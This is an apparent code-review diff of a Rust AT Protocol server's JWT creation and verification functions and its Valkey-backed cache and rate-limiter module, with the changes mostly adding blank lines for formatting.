Ok(create_access_token_with_metadata(did, key_bytes)?.token)
25
}
26
pub fn create_refresh_token(did: &str, key_bytes: &[u8]) -> Result<String> {
27
Ok(create_refresh_token_with_metadata(did, key_bytes)?.token)
28
}
29
pub fn create_access_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
30
create_signed_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, key_bytes, Duration::minutes(120))
31
}
32
pub fn create_refresh_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
33
create_signed_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, key_bytes, Duration::days(90))
34
}
35
pub fn create_service_token(did: &str, aud: &str, lxm: &str, key_bytes: &[u8]) -> Result<String> {
36
let signing_key = SigningKey::from_slice(key_bytes)?;
37
let expiration = Utc::now()
38
.checked_add_signed(Duration::seconds(60))
39
.expect("valid timestamp")
40
.timestamp();
41
let claims = Claims {
42
iss: did.to_owned(),
43
sub: did.to_owned(),
···
48
lxm: Some(lxm.to_string()),
49
jti: uuid::Uuid::new_v4().to_string(),
50
};
51
sign_claims(claims, &signing_key)
52
}
53
fn create_signed_token_with_metadata(
54
did: &str,
55
scope: &str,
···
58
duration: Duration,
59
) -> Result<TokenWithMetadata> {
60
let signing_key = SigningKey::from_slice(key_bytes)?;
61
let expires_at = Utc::now()
62
.checked_add_signed(duration)
63
.expect("valid timestamp");
64
let expiration = expires_at.timestamp();
65
let jti = uuid::Uuid::new_v4().to_string();
66
let claims = Claims {
67
iss: did.to_owned(),
68
sub: did.to_owned(),
···
76
lxm: None,
77
jti: jti.clone(),
78
};
79
let token = sign_claims_with_type(claims, &signing_key, typ)?;
80
Ok(TokenWithMetadata {
81
token,
82
jti,
83
expires_at,
84
})
85
}
86
fn sign_claims(claims: Claims, key: &SigningKey) -> Result<String> {
87
sign_claims_with_type(claims, key, TOKEN_TYPE_SERVICE)
88
}
89
fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<String> {
90
let header = Header {
91
alg: "ES256K".to_string(),
92
typ: typ.to_string(),
93
};
94
let header_json = serde_json::to_string(&header)?;
95
let claims_json = serde_json::to_string(&claims)?;
96
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
97
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
98
let message = format!("{}.{}", header_b64, claims_b64);
99
let signature: Signature = key.sign(message.as_bytes());
100
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
101
Ok(format!("{}.{}", message, signature_b64))
102
}
103
pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
104
Ok(create_access_token_hs256_with_metadata(did, secret)?.token)
105
}
106
pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
107
Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token)
108
}
109
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
110
create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
111
}
112
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
113
create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
114
}
115
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
116
let expiration = Utc::now()
117
.checked_add_signed(Duration::seconds(60))
118
.expect("valid timestamp")
119
.timestamp();
120
let claims = Claims {
121
iss: did.to_owned(),
122
sub: did.to_owned(),
···
127
lxm: Some(lxm.to_string()),
128
jti: uuid::Uuid::new_v4().to_string(),
129
};
130
sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret)
131
}
132
fn create_hs256_token_with_metadata(
133
did: &str,
134
scope: &str,
···
139
let expires_at = Utc::now()
140
.checked_add_signed(duration)
141
.expect("valid timestamp");
142
let expiration = expires_at.timestamp();
143
let jti = uuid::Uuid::new_v4().to_string();
144
let claims = Claims {
145
iss: did.to_owned(),
146
sub: did.to_owned(),
···
154
lxm: None,
155
jti: jti.clone(),
156
};
157
let token = sign_claims_hs256(claims, typ, secret)?;
158
Ok(TokenWithMetadata {
159
token,
160
jti,
161
expires_at,
162
})
163
}
164
fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> {
165
let header = Header {
166
alg: "HS256".to_string(),
167
typ: typ.to_string(),
168
};
169
let header_json = serde_json::to_string(&header)?;
170
let claims_json = serde_json::to_string(&claims)?;
171
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
172
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
173
let message = format!("{}.{}", header_b64, claims_b64);
174
let mut mac = HmacSha256::new_from_slice(secret)
175
.map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?;
176
mac.update(message.as_bytes());
177
let signature = mac.finalize().into_bytes();
178
let signature_b64 = URL_SAFE_NO_PAD.encode(signature);
179
Ok(format!("{}.{}", message, signature_b64))
180
}
···
7
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
8
use sha2::Sha256;
9
use uuid;
10
+
11
type HmacSha256 = Hmac<Sha256>;
12
+
13
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
14
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
15
pub const TOKEN_TYPE_SERVICE: &str = "jwt";
···
17
pub const SCOPE_REFRESH: &str = "com.atproto.refresh";
18
pub const SCOPE_APP_PASS: &str = "com.atproto.appPass";
19
pub const SCOPE_APP_PASS_PRIVILEGED: &str = "com.atproto.appPassPrivileged";
20
+
21
pub struct TokenWithMetadata {
22
pub token: String,
23
pub jti: String,
24
pub expires_at: DateTime<Utc>,
25
}
26
+
27
pub fn create_access_token(did: &str, key_bytes: &[u8]) -> Result<String> {
28
Ok(create_access_token_with_metadata(did, key_bytes)?.token)
29
}
30
+
31
pub fn create_refresh_token(did: &str, key_bytes: &[u8]) -> Result<String> {
32
Ok(create_refresh_token_with_metadata(did, key_bytes)?.token)
33
}
34
+
35
pub fn create_access_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
36
create_signed_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, key_bytes, Duration::minutes(120))
37
}
38
+
39
pub fn create_refresh_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> {
40
create_signed_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, key_bytes, Duration::days(90))
41
}
42
+
43
pub fn create_service_token(did: &str, aud: &str, lxm: &str, key_bytes: &[u8]) -> Result<String> {
44
let signing_key = SigningKey::from_slice(key_bytes)?;
45
+
46
let expiration = Utc::now()
47
.checked_add_signed(Duration::seconds(60))
48
.expect("valid timestamp")
49
.timestamp();
50
+
51
let claims = Claims {
52
iss: did.to_owned(),
53
sub: did.to_owned(),
···
58
lxm: Some(lxm.to_string()),
59
jti: uuid::Uuid::new_v4().to_string(),
60
};
61
+
62
sign_claims(claims, &signing_key)
63
}
64
+
65
fn create_signed_token_with_metadata(
66
did: &str,
67
scope: &str,
···
70
duration: Duration,
71
) -> Result<TokenWithMetadata> {
72
let signing_key = SigningKey::from_slice(key_bytes)?;
73
+
74
let expires_at = Utc::now()
75
.checked_add_signed(duration)
76
.expect("valid timestamp");
77
+
78
let expiration = expires_at.timestamp();
79
let jti = uuid::Uuid::new_v4().to_string();
80
+
81
let claims = Claims {
82
iss: did.to_owned(),
83
sub: did.to_owned(),
···
91
lxm: None,
92
jti: jti.clone(),
93
};
94
+
95
let token = sign_claims_with_type(claims, &signing_key, typ)?;
96
+
97
Ok(TokenWithMetadata {
98
token,
99
jti,
100
expires_at,
101
})
102
}
103
+
104
fn sign_claims(claims: Claims, key: &SigningKey) -> Result<String> {
105
sign_claims_with_type(claims, key, TOKEN_TYPE_SERVICE)
106
}
107
+
108
fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<String> {
109
let header = Header {
110
alg: "ES256K".to_string(),
111
typ: typ.to_string(),
112
};
113
+
114
let header_json = serde_json::to_string(&header)?;
115
let claims_json = serde_json::to_string(&claims)?;
116
+
117
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
118
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
119
+
120
let message = format!("{}.{}", header_b64, claims_b64);
121
let signature: Signature = key.sign(message.as_bytes());
122
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
123
+
124
Ok(format!("{}.{}", message, signature_b64))
125
}
126
+
127
pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
128
Ok(create_access_token_hs256_with_metadata(did, secret)?.token)
129
}
130
+
131
pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
132
Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token)
133
}
134
+
135
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
136
create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
137
}
138
+
139
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
140
create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
141
}
142
+
143
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
144
let expiration = Utc::now()
145
.checked_add_signed(Duration::seconds(60))
146
.expect("valid timestamp")
147
.timestamp();
148
+
149
let claims = Claims {
150
iss: did.to_owned(),
151
sub: did.to_owned(),
···
156
lxm: Some(lxm.to_string()),
157
jti: uuid::Uuid::new_v4().to_string(),
158
};
159
+
160
sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret)
161
}
162
+
163
fn create_hs256_token_with_metadata(
164
did: &str,
165
scope: &str,
···
170
let expires_at = Utc::now()
171
.checked_add_signed(duration)
172
.expect("valid timestamp");
173
+
174
let expiration = expires_at.timestamp();
175
let jti = uuid::Uuid::new_v4().to_string();
176
+
177
let claims = Claims {
178
iss: did.to_owned(),
179
sub: did.to_owned(),
···
187
lxm: None,
188
jti: jti.clone(),
189
};
190
+
191
let token = sign_claims_hs256(claims, typ, secret)?;
192
+
193
Ok(TokenWithMetadata {
194
token,
195
jti,
196
expires_at,
197
})
198
}
199
+
200
fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> {
201
let header = Header {
202
alg: "HS256".to_string(),
203
typ: typ.to_string(),
204
};
205
+
206
let header_json = serde_json::to_string(&header)?;
207
let claims_json = serde_json::to_string(&claims)?;
208
+
209
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
210
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
211
+
212
let message = format!("{}.{}", header_b64, claims_b64);
213
+
214
let mut mac = HmacSha256::new_from_slice(secret)
215
.map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?;
216
mac.update(message.as_bytes());
217
+
218
let signature = mac.finalize().into_bytes();
219
let signature_b64 = URL_SAFE_NO_PAD.encode(signature);
220
+
221
Ok(format!("{}.{}", message, signature_b64))
222
}
+48
src/auth/verify.rs
+48
src/auth/verify.rs
···
8
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
9
use sha2::Sha256;
10
use subtle::ConstantTimeEq;
11
type HmacSha256 = Hmac<Sha256>;
12
pub fn get_did_from_token(token: &str) -> Result<String, String> {
13
let parts: Vec<&str> = token.split('.').collect();
14
if parts.len() != 3 {
15
return Err("Invalid token format".to_string());
16
}
17
let payload_bytes = URL_SAFE_NO_PAD
18
.decode(parts[1])
19
.map_err(|e| format!("Base64 decode failed: {}", e))?;
20
let claims: UnsafeClaims =
21
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
22
Ok(claims.sub.unwrap_or(claims.iss))
23
}
24
pub fn get_jti_from_token(token: &str) -> Result<String, String> {
25
let parts: Vec<&str> = token.split('.').collect();
26
if parts.len() != 3 {
27
return Err("Invalid token format".to_string());
28
}
29
let payload_bytes = URL_SAFE_NO_PAD
30
.decode(parts[1])
31
.map_err(|e| format!("Base64 decode failed: {}", e))?;
32
let claims: serde_json::Value =
33
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
34
claims.get("jti")
35
.and_then(|j| j.as_str())
36
.map(|s| s.to_string())
37
.ok_or_else(|| "No jti claim in token".to_string())
38
}
39
pub fn verify_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
40
verify_token_internal(token, key_bytes, None, None)
41
}
42
pub fn verify_access_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
43
verify_token_internal(
44
token,
···
47
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
48
)
49
}
50
pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
51
verify_token_internal(
52
token,
···
55
Some(&[SCOPE_REFRESH]),
56
)
57
}
58
pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
59
verify_token_hs256_internal(
60
token,
···
63
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
64
)
65
}
66
pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
67
verify_token_hs256_internal(
68
token,
···
71
Some(&[SCOPE_REFRESH]),
72
)
73
}
74
fn verify_token_internal(
75
token: &str,
76
key_bytes: &[u8],
···
81
if parts.len() != 3 {
82
return Err(anyhow!("Invalid token format"));
83
}
84
let header_b64 = parts[0];
85
let claims_b64 = parts[1];
86
let signature_b64 = parts[2];
87
let header_bytes = URL_SAFE_NO_PAD
88
.decode(header_b64)
89
.context("Base64 decode of header failed")?;
90
let header: Header =
91
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
92
if let Some(expected) = expected_typ {
93
if header.typ != expected {
94
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
95
}
96
}
97
let signature_bytes = URL_SAFE_NO_PAD
98
.decode(signature_b64)
99
.context("Base64 decode of signature failed")?;
100
let signature = Signature::from_slice(&signature_bytes)
101
.map_err(|e| anyhow!("Invalid signature format: {}", e))?;
102
let signing_key = SigningKey::from_slice(key_bytes)?;
103
let verifying_key = VerifyingKey::from(&signing_key);
104
let message = format!("{}.{}", header_b64, claims_b64);
105
verifying_key
106
.verify(message.as_bytes(), &signature)
107
.map_err(|e| anyhow!("Signature verification failed: {}", e))?;
108
let claims_bytes = URL_SAFE_NO_PAD
109
.decode(claims_b64)
110
.context("Base64 decode of claims failed")?;
111
let claims: Claims =
112
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
113
let now = Utc::now().timestamp() as usize;
114
if claims.exp < now {
115
return Err(anyhow!("Token expired"));
116
}
117
if let Some(scopes) = allowed_scopes {
118
let token_scope = claims.scope.as_deref().unwrap_or("");
119
if !scopes.contains(&token_scope) {
120
return Err(anyhow!("Invalid token scope: {}", token_scope));
121
}
122
}
123
Ok(TokenData { claims })
124
}
125
fn verify_token_hs256_internal(
126
token: &str,
127
secret: &[u8],
···
132
if parts.len() != 3 {
133
return Err(anyhow!("Invalid token format"));
134
}
135
let header_b64 = parts[0];
136
let claims_b64 = parts[1];
137
let signature_b64 = parts[2];
138
let header_bytes = URL_SAFE_NO_PAD
139
.decode(header_b64)
140
.context("Base64 decode of header failed")?;
141
let header: Header =
142
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
143
if header.alg != "HS256" {
144
return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
145
}
146
if let Some(expected) = expected_typ {
147
if header.typ != expected {
148
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
149
}
150
}
151
let signature_bytes = URL_SAFE_NO_PAD
152
.decode(signature_b64)
153
.context("Base64 decode of signature failed")?;
154
let message = format!("{}.{}", header_b64, claims_b64);
155
let mut mac = HmacSha256::new_from_slice(secret)
156
.map_err(|e| anyhow!("Invalid secret: {}", e))?;
157
mac.update(message.as_bytes());
158
let expected_signature = mac.finalize().into_bytes();
159
let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into();
160
if !is_valid {
161
return Err(anyhow!("Signature verification failed"));
162
}
163
let claims_bytes = URL_SAFE_NO_PAD
164
.decode(claims_b64)
165
.context("Base64 decode of claims failed")?;
166
let claims: Claims =
167
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
168
let now = Utc::now().timestamp() as usize;
169
if claims.exp < now {
170
return Err(anyhow!("Token expired"));
171
}
172
if let Some(scopes) = allowed_scopes {
173
let token_scope = claims.scope.as_deref().unwrap_or("");
174
if !scopes.contains(&token_scope) {
175
return Err(anyhow!("Invalid token scope: {}", token_scope));
176
}
177
}
178
Ok(TokenData { claims })
179
}
180
pub fn get_algorithm_from_token(token: &str) -> Result<String, String> {
181
let parts: Vec<&str> = token.split('.').collect();
182
if parts.len() != 3 {
183
return Err("Invalid token format".to_string());
184
}
185
let header_bytes = URL_SAFE_NO_PAD
186
.decode(parts[0])
187
.map_err(|e| format!("Base64 decode failed: {}", e))?;
188
let header: Header =
189
serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
190
Ok(header.alg)
191
}
···
8
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
9
use sha2::Sha256;
10
use subtle::ConstantTimeEq;
11
+
12
type HmacSha256 = Hmac<Sha256>;
13
+
14
pub fn get_did_from_token(token: &str) -> Result<String, String> {
15
let parts: Vec<&str> = token.split('.').collect();
16
if parts.len() != 3 {
17
return Err("Invalid token format".to_string());
18
}
19
+
20
let payload_bytes = URL_SAFE_NO_PAD
21
.decode(parts[1])
22
.map_err(|e| format!("Base64 decode failed: {}", e))?;
23
+
24
let claims: UnsafeClaims =
25
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
26
+
27
Ok(claims.sub.unwrap_or(claims.iss))
28
}
29
+
30
pub fn get_jti_from_token(token: &str) -> Result<String, String> {
31
let parts: Vec<&str> = token.split('.').collect();
32
if parts.len() != 3 {
33
return Err("Invalid token format".to_string());
34
}
35
+
36
let payload_bytes = URL_SAFE_NO_PAD
37
.decode(parts[1])
38
.map_err(|e| format!("Base64 decode failed: {}", e))?;
39
+
40
let claims: serde_json::Value =
41
serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
42
+
43
claims.get("jti")
44
.and_then(|j| j.as_str())
45
.map(|s| s.to_string())
46
.ok_or_else(|| "No jti claim in token".to_string())
47
}
48
+
49
pub fn verify_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
50
verify_token_internal(token, key_bytes, None, None)
51
}
52
+
53
pub fn verify_access_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
54
verify_token_internal(
55
token,
···
58
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
59
)
60
}
61
+
62
pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> {
63
verify_token_internal(
64
token,
···
67
Some(&[SCOPE_REFRESH]),
68
)
69
}
70
+
71
pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
72
verify_token_hs256_internal(
73
token,
···
76
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
77
)
78
}
79
+
80
pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
81
verify_token_hs256_internal(
82
token,
···
85
Some(&[SCOPE_REFRESH]),
86
)
87
}
88
+
89
fn verify_token_internal(
90
token: &str,
91
key_bytes: &[u8],
···
96
if parts.len() != 3 {
97
return Err(anyhow!("Invalid token format"));
98
}
99
+
100
let header_b64 = parts[0];
101
let claims_b64 = parts[1];
102
let signature_b64 = parts[2];
103
+
104
let header_bytes = URL_SAFE_NO_PAD
105
.decode(header_b64)
106
.context("Base64 decode of header failed")?;
107
+
108
let header: Header =
109
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
110
+
111
if let Some(expected) = expected_typ {
112
if header.typ != expected {
113
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
114
}
115
}
116
+
117
let signature_bytes = URL_SAFE_NO_PAD
118
.decode(signature_b64)
119
.context("Base64 decode of signature failed")?;
120
+
121
let signature = Signature::from_slice(&signature_bytes)
122
.map_err(|e| anyhow!("Invalid signature format: {}", e))?;
123
+
124
let signing_key = SigningKey::from_slice(key_bytes)?;
125
let verifying_key = VerifyingKey::from(&signing_key);
126
+
127
let message = format!("{}.{}", header_b64, claims_b64);
128
verifying_key
129
.verify(message.as_bytes(), &signature)
130
.map_err(|e| anyhow!("Signature verification failed: {}", e))?;
131
+
132
let claims_bytes = URL_SAFE_NO_PAD
133
.decode(claims_b64)
134
.context("Base64 decode of claims failed")?;
135
+
136
let claims: Claims =
137
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
138
+
139
let now = Utc::now().timestamp() as usize;
140
if claims.exp < now {
141
return Err(anyhow!("Token expired"));
142
}
143
+
144
if let Some(scopes) = allowed_scopes {
145
let token_scope = claims.scope.as_deref().unwrap_or("");
146
if !scopes.contains(&token_scope) {
147
return Err(anyhow!("Invalid token scope: {}", token_scope));
148
}
149
}
150
+
151
Ok(TokenData { claims })
152
}
153
+
154
fn verify_token_hs256_internal(
155
token: &str,
156
secret: &[u8],
···
161
if parts.len() != 3 {
162
return Err(anyhow!("Invalid token format"));
163
}
164
+
165
let header_b64 = parts[0];
166
let claims_b64 = parts[1];
167
let signature_b64 = parts[2];
168
+
169
let header_bytes = URL_SAFE_NO_PAD
170
.decode(header_b64)
171
.context("Base64 decode of header failed")?;
172
+
173
let header: Header =
174
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
175
+
176
if header.alg != "HS256" {
177
return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
178
}
179
+
180
if let Some(expected) = expected_typ {
181
if header.typ != expected {
182
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
183
}
184
}
185
+
186
let signature_bytes = URL_SAFE_NO_PAD
187
.decode(signature_b64)
188
.context("Base64 decode of signature failed")?;
189
+
190
let message = format!("{}.{}", header_b64, claims_b64);
191
+
192
let mut mac = HmacSha256::new_from_slice(secret)
193
.map_err(|e| anyhow!("Invalid secret: {}", e))?;
194
mac.update(message.as_bytes());
195
+
196
let expected_signature = mac.finalize().into_bytes();
197
let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into();
198
+
199
if !is_valid {
200
return Err(anyhow!("Signature verification failed"));
201
}
202
+
203
let claims_bytes = URL_SAFE_NO_PAD
204
.decode(claims_b64)
205
.context("Base64 decode of claims failed")?;
206
+
207
let claims: Claims =
208
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
209
+
210
let now = Utc::now().timestamp() as usize;
211
if claims.exp < now {
212
return Err(anyhow!("Token expired"));
213
}
214
+
215
if let Some(scopes) = allowed_scopes {
216
let token_scope = claims.scope.as_deref().unwrap_or("");
217
if !scopes.contains(&token_scope) {
218
return Err(anyhow!("Invalid token scope: {}", token_scope));
219
}
220
}
221
+
222
Ok(TokenData { claims })
223
}
224
+
225
pub fn get_algorithm_from_token(token: &str) -> Result<String, String> {
226
let parts: Vec<&str> = token.split('.').collect();
227
if parts.len() != 3 {
228
return Err("Invalid token format".to_string());
229
}
230
+
231
let header_bytes = URL_SAFE_NO_PAD
232
.decode(parts[0])
233
.map_err(|e| format!("Base64 decode failed: {}", e))?;
234
+
235
let header: Header =
236
serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
237
+
238
Ok(header.alg)
239
}
+24
src/cache/mod.rs
+24
src/cache/mod.rs
···
2
use base64::{Engine as _, engine::general_purpose::STANDARD as BASE64};
3
use std::sync::Arc;
4
use std::time::Duration;
5
#[derive(Debug, thiserror::Error)]
6
pub enum CacheError {
7
#[error("Cache connection error: {0}")]
···
9
#[error("Serialization error: {0}")]
10
Serialization(String),
11
}
12
#[async_trait]
13
pub trait Cache: Send + Sync {
14
async fn get(&self, key: &str) -> Option<String>;
···
22
self.set(key, &encoded, ttl).await
23
}
24
}
25
#[derive(Clone)]
26
pub struct ValkeyCache {
27
conn: redis::aio::ConnectionManager,
28
}
29
impl ValkeyCache {
30
pub async fn new(url: &str) -> Result<Self, CacheError> {
31
let client = redis::Client::open(url)
···
36
.map_err(|e| CacheError::Connection(e.to_string()))?;
37
Ok(Self { conn: manager })
38
}
39
pub fn connection(&self) -> redis::aio::ConnectionManager {
40
self.conn.clone()
41
}
42
}
43
#[async_trait]
44
impl Cache for ValkeyCache {
45
async fn get(&self, key: &str) -> Option<String> {
···
51
.ok()
52
.flatten()
53
}
54
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
55
let mut conn = self.conn.clone();
56
redis::cmd("SET")
···
62
.await
63
.map_err(|e| CacheError::Connection(e.to_string()))
64
}
65
async fn delete(&self, key: &str) -> Result<(), CacheError> {
66
let mut conn = self.conn.clone();
67
redis::cmd("DEL")
···
71
.map_err(|e| CacheError::Connection(e.to_string()))
72
}
73
}
74
pub struct NoOpCache;
75
#[async_trait]
76
impl Cache for NoOpCache {
77
async fn get(&self, _key: &str) -> Option<String> {
78
None
79
}
80
async fn set(&self, _key: &str, _value: &str, _ttl: Duration) -> Result<(), CacheError> {
81
Ok(())
82
}
83
async fn delete(&self, _key: &str) -> Result<(), CacheError> {
84
Ok(())
85
}
86
}
87
#[async_trait]
88
pub trait DistributedRateLimiter: Send + Sync {
89
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool;
90
}
91
#[derive(Clone)]
92
pub struct RedisRateLimiter {
93
conn: redis::aio::ConnectionManager,
94
}
95
impl RedisRateLimiter {
96
pub fn new(conn: redis::aio::ConnectionManager) -> Self {
97
Self { conn }
98
}
99
}
100
#[async_trait]
101
impl DistributedRateLimiter for RedisRateLimiter {
102
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool {
···
124
count <= limit as i64
125
}
126
}
127
pub struct NoOpRateLimiter;
128
#[async_trait]
129
impl DistributedRateLimiter for NoOpRateLimiter {
130
async fn check_rate_limit(&self, _key: &str, _limit: u32, _window_ms: u64) -> bool {
131
true
132
}
133
}
134
pub enum CacheBackend {
135
Valkey(ValkeyCache),
136
NoOp,
137
}
138
impl CacheBackend {
139
pub fn rate_limiter(&self) -> Arc<dyn DistributedRateLimiter> {
140
match self {
···
145
}
146
}
147
}
148
#[async_trait]
149
impl Cache for CacheBackend {
150
async fn get(&self, key: &str) -> Option<String> {
···
153
CacheBackend::NoOp => None,
154
}
155
}
156
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
157
match self {
158
CacheBackend::Valkey(c) => c.set(key, value, ttl).await,
159
CacheBackend::NoOp => Ok(()),
160
}
161
}
162
async fn delete(&self, key: &str) -> Result<(), CacheError> {
163
match self {
164
CacheBackend::Valkey(c) => c.delete(key).await,
···
166
}
167
}
168
}
169
pub async fn create_cache() -> (Arc<dyn Cache>, Arc<dyn DistributedRateLimiter>) {
170
match std::env::var("VALKEY_URL") {
171
Ok(url) => match ValkeyCache::new(&url).await {
···
2
use base64::{Engine as _, engine::general_purpose::STANDARD as BASE64};
3
use std::sync::Arc;
4
use std::time::Duration;
5
+
6
#[derive(Debug, thiserror::Error)]
7
pub enum CacheError {
8
#[error("Cache connection error: {0}")]
···
10
#[error("Serialization error: {0}")]
11
Serialization(String),
12
}
13
+
14
#[async_trait]
15
pub trait Cache: Send + Sync {
16
async fn get(&self, key: &str) -> Option<String>;
···
24
self.set(key, &encoded, ttl).await
25
}
26
}
27
+
28
#[derive(Clone)]
29
pub struct ValkeyCache {
30
conn: redis::aio::ConnectionManager,
31
}
32
+
33
impl ValkeyCache {
34
pub async fn new(url: &str) -> Result<Self, CacheError> {
35
let client = redis::Client::open(url)
···
40
.map_err(|e| CacheError::Connection(e.to_string()))?;
41
Ok(Self { conn: manager })
42
}
43
+
44
pub fn connection(&self) -> redis::aio::ConnectionManager {
45
self.conn.clone()
46
}
47
}
48
+
49
#[async_trait]
50
impl Cache for ValkeyCache {
51
async fn get(&self, key: &str) -> Option<String> {
···
57
.ok()
58
.flatten()
59
}
60
+
61
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
62
let mut conn = self.conn.clone();
63
redis::cmd("SET")
···
69
.await
70
.map_err(|e| CacheError::Connection(e.to_string()))
71
}
72
+
73
async fn delete(&self, key: &str) -> Result<(), CacheError> {
74
let mut conn = self.conn.clone();
75
redis::cmd("DEL")
···
79
.map_err(|e| CacheError::Connection(e.to_string()))
80
}
81
}
82
+
83
pub struct NoOpCache;
84
+
85
#[async_trait]
86
impl Cache for NoOpCache {
87
async fn get(&self, _key: &str) -> Option<String> {
88
None
89
}
90
+
91
async fn set(&self, _key: &str, _value: &str, _ttl: Duration) -> Result<(), CacheError> {
92
Ok(())
93
}
94
+
95
async fn delete(&self, _key: &str) -> Result<(), CacheError> {
96
Ok(())
97
}
98
}
99
+
100
#[async_trait]
101
pub trait DistributedRateLimiter: Send + Sync {
102
